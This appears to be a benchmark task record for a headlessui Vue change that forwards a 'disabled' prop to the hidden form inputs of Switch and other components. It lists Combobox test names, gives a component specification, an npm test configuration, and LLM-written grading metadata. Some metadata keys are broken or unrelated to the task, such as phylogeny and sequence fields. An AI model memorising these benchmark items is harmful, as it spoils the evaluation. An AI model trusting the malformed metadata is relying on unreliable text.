"should be possible to use ArrowDown to navigate the combobox options and skip the first disabled one", "should be possible to use ArrowDown to navigate the combobox options and jump to the first non-disabled one", "should be possible to go to the next item if no value is set", "should be possible to use ArrowUp to navigate the combobox options", "should be possible to use the End key to go to the last combobox option", "should be possible to use the End key to go to the last non disabled combobox option", "should be possible to use the End key to go to the first combobox option if that is the only non-disabled combobox option", "should have no active combobox option upon End key press, when there are no non-disabled combobox options", "should be possible to use the PageDown key to go to the last combobox option", "should be possible to use the PageDown key to go to the last non disabled combobox option", "should be possible to use the PageDown key to go to the first combobox option if that is the only non-disabled combobox option", "should have no active combobox option upon PageDown key press, when there are no non-disabled combobox options", "should be possible to use the Home key to go to the first combobox option", "should be possible to use the Home key to go to the first non disabled combobox option", "should be possible to use the Home key to go to the last combobox option if that is the only non-disabled combobox option", "should have no active combobox option upon Home key press, when there are no non-disabled combobox options", "should be possible to use the PageUp key to go to the first combobox option", "should be possible to use the PageUp key to go to the first non disabled combobox option", "should be possible to use the PageUp key to go to the last combobox option if that is the only non-disabled combobox option", "should have no active combobox option upon PageUp key press, when there are no non-disabled combobox options", "should reset the value when the last character is removed, when in `nullable` mode", "should not be possible to search and activate a disabled option", "should maintain activeIndex and activeOption when filtering", "should focus the Combobox.Input when we click the Combobox.Label", "should not focus the Combobox.Input when we right click the Combobox.Label", "should be possible to open the combobox by focusing the input with immediate mode enabled", "should not be possible to open the combobox by focusing the input with immediate mode disabled", "should not be possible to open the combobox by focusing the input with immediate mode enabled when button is disabled", "should be possible to close a combobox on click with immediate mode enabled", "should be possible to close a focused combobox on click with immediate mode enabled", "should be possible to open the combobox on click", "should not be possible to open the combobox on right click", "should not be possible to open the combobox on click when the button is disabled", "should be possible to open the combobox on click, and focus the selected option", "should be possible to close a combobox on click", "should be a no-op when we click outside of a closed combobox", "should be possible to click outside of the combobox on another combobox button which should close the current combobox and open the new combobox", "should be possible to click outside of the combobox which should close the combobox (even if we press the combobox button)", "should be possible to click outside of the combobox, on an element which is within a focusable element, which closes the combobox", "should be possible to hover an option and make it active when using `static`", "should make a combobox option active when you move the mouse over it", "should be a no-op when we move the mouse and the combobox option is already active", "should be a no-op when we move the mouse and the combobox option is disabled", "should be possible to click a combobox option, which closes the combobox", "should be possible to click a combobox option, which closes the combobox with immediate mode enabled", "should be possible to click a disabled combobox option, which is a no-op", "should be possible focus a combobox option, so that it becomes active", "should not be possible to focus a combobox option which is disabled", "should be possible to hold the last active option", "should sync the input field correctly and reset it when resetting the value from outside (to null)", "should warn when changing the combobox from uncontrolled to controlled", "should warn when changing the combobox from controlled to uncontrolled", "should sync the input field correctly and reset it when resetting the value from outside (when using displayValue)", "should be possible to pass multiple values to the Combobox component", "should keep the combobox open when selecting an item via the keyboard", "should reset the active option, if the active option gets unmounted", "should error when we are using a <ComboboxButton /> without a parent <Combobox />", "should error when we are using a <ComboboxLabel /> without a parent <Combobox />", "should error when we are using a <ComboboxOptions /> without a parent <Combobox />", "should error when we are using a <ComboboxOption /> without a parent <Combobox />", "selecting an option puts the display value into Combobox.Input when displayValue is provided (when v-model is undefined)", "should be possible to render a ComboboxLabel using a render prop", "should be possible to render a ComboboxLabel using a render prop and an `as` prop", "should be possible to render a ComboboxButton using a render prop", "should be possible to render a ComboboxButton using a render prop and an `as` prop", "should be possible to render a ComboboxButton and a ComboboxLabel and see them linked together", "should be possible to render ComboboxOptions using a render prop", "should be possible to always render the ComboboxOptions if we provide it a `static` prop", "should be possible to use a different render strategy for the ComboboxOptions", "should be possible to render a ComboboxOption using a render prop", "should always open the ComboboxOptions because of a wrapping OpenClosed component", "should always close the ComboboxOptions because of a wrapping OpenClosed component", "should sync the active index properly", "should be possible to open the Combobox with Enter", "should be possible to use the PageDown key to go to the last non disabled Combobox option", "should focus the ComboboxButton when we click the ComboboxLabel", "should not focus the ComboboxInput when we right click the ComboboxLabel", "should sync the input field correctly and reset it when resetting the value from outside (to undefined)" ]
Function: Switch(props) Location: packages/@headlessui-vue/src/components/switch/switch.ts Inputs: - **disabled** (boolean, default false) – when true the component is non‑interactive and the hidden input that participates in form submission will receive a `disabled` attribute. - **name** (string, optional) – the name of the form field to be submitted. - **value** (string, optional) – the value associated with the field when the switch is checked. - **id** (string, optional) – unique element identifier. - **tabIndex** (number, default 0) – custom tab order for the control. - **modelValue** / **checked** (boolean) – current on/off state (handled via `v-model`). Outputs: - Renders a hidden `<input type="checkbox">` (or similar) with `hidden`, `readOnly`, `form`, `name`, `value`, and **disabled** attributes reflecting the props. When `disabled` is true the hidden input is disabled and therefore omitted from `FormData` on form submission. The visible switch element reflects the disabled state visually and prevents interaction. Description: The Switch component now accepts a `disabled` Boolean prop and propagates it to the internally generated hidden input used for form integration, ensuring disabled switches are not submitted as part of a form. Use this prop to make a switch read‑only and to prevent its value from being sent on form submit.
MIT
{ "base_image_name": "node_20", "install": [ "npm ci --prefer-offline --no-audit --progress=false" ], "log_parser": "parse_log_js_4", "test_cmd": "npm test -- --verbose --no-colors" }
{ "num_modified_files": 12, "num_modified_lines": 30, "pr_author": "RobinMalfait", "pr_labels": [], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.97, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [], "intent_completeness": "complete", "patch": null, "pr_categories": [ "minor_bug" ], "reason": null, "reasoning": "The issue asks to forward the `disabled` prop to the hidden `<input>` elements used for form submission, preventing disabled components from contributing data. The added tests verify that when a component is disabled, only the explicit hidden field is submitted, matching the intended behavior. There are no mismatches between the tests and the specification, and no signals of B‑category problems (no external docs, no implicit naming, no ambiguous requirements). The task is well‑defined and can be solved by propagating the `disabled` flag to the hidden fields across the relevant components, which is a straightforward code change.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }